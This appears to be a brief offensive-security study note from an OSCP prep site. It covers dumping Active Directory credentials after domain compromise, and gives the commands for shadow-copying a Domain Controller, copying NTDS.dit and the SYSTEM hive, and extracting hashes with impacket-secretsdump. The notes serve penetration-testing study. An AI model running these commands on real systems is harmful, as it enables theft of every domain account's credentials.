// notes/ Active Directory
🏛️
Post Domain Compromise Shadow Copies
Use the MS signed vshadow tool to take a snapshot of the Domain Controller
#active directory#adot8
source · oscp.adot8.com · active-directory/post-domain-compromise_shadow-copies ↗Shadow Copies
Use the MS signed vshadow tool to take a snapshot of the Domain Controller
code
01vshadow.exe -nw -p C:Find the Shadow copy device name
{% hint style="info" %} Could look something like this \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 {% endhint %}
Make a new NTDS.dit
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
Grab the system hive
code
01reg.exe save hklm\system c:\system.bakDump NTDS.dit locally
code
01impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL